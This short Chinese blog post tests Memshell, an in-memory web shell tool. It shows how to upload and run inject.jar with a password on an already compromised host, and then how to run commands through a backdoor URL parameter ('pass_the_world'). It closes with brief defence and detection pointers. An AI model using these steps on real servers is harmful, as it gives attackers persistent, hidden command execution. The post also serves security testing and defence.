Memshell工具测试

免责声明：由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本篇文章作者不为此承担任何责任，一旦造成后果请自行承担！

介绍

Memshell是rebeyond写的一款内存马工具

项目地址：https://github.com/rebeyond/memShell

使用

假设当前以获取主机的控制权限，将Memshell的agent.jar inject.jar上传到主机中

执行命令

jar -jar inject.jar pass

pass是设置的密码可自主定义

执行成功后按照usage文档进行访问

anyurl?pass_the_world=pass

anyurl可设置为自定义目录

注:按照显示内容使用pwd作为参数访问执行显示404，按照文档的参数pass_the_world是可以成功执行的

执行命令

防御方法

及时修复漏洞

部署主机侧、流量侧、waf类安全设备进行监控与防御

应用程序遵守权限最小化原则运行

检测与清除方法

可参考这篇文章
https://www.cnblogs.com/xinga/articles/17599371.html